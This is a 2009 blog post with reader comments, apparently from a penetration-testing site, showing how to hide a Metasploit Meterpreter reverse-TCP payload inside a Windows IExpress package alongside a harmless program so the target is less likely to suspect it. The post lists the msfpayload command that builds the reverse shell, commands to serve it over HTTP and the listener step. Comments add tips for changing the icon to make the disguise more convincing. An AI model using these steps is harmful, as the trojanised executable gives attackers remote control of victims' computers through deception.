Monday
Mar022009
Metasploit heart's Microsoft
Monday, March 2, 2009 at 2:24PM Hiding Meterpreter with IExpress from mubix on Vimeo.
Using the IExpress, a built in tool (XP, not sure about other Windows versions), we package two executables together, so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it's easyier to dupe, or a different malicious executable (leekspin perhaps?).
I'll let your minds take this to the level I know you all are capable of. One caveat is that the icon for the executable is that of the self extractor, which shouldn't be that much of an issue to change, but I don't know off the top of my head of an app that does it, so please comment and let me know if you do.
Commands from video:
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
- (For python 2.4+) python -m SimpleHTTPServer
- (For python 2.3 -) python -c "from SimpleHTTPServer import test; test()"
- Start -> Run -> iexpress <return>
- Run multi/hander from command line (not shown in video)
Links from video:
tagged Microsoft, bob, iexpress, instructional, metasploit, vimeo, virustotal in Hacking
Microsoft, bob, iexpress, instructional, metasploit, vimeo, virustotal in Hacking
Reader Comments (10)
You can use reshack to extract, view, save, and modify resources such as icons etc. http://angusj.com/resourcehacker/
That is awesome. Just fixed it up. posting screen shots soon.
Iexpress also exists in Vista Not that I would wish that OS on anyone.
is the video stuck at 1.09 min ? i tried the direct link too same problem ?
I seriously don't know what the deal is, some people are having that issue at 1 minute, some at 4, some not at all.
I posted it on Youtube. Check out http://www.room362.com/archives/440-metasploit-2.html" rel="nofollow">http://www.room362.com/archives/440-metasploit-2.html
i tried it on several computers different networks same problem is there any way that u can upload it again under different link
hey, just used this successfully on a pentewt. good stuff.
if you want to bundle with a VBS script, be aware that the extraction code drops the vbs file (or any file for that matter with the 8-character dos name. for example: testbinary.exe would become testbi~1.exe
when you give the command to run after installation, it would look like: wscript testbi~1.exe
works like a charm :)
jcran
Bitchin! Adding this to a little competition I'm working on. Thanks for the vid (muwahahaha). ; )
to change the icons and other resources of the executable one could use the old, but still working resource hacker - see http://www.angusj.com/resourcehacker/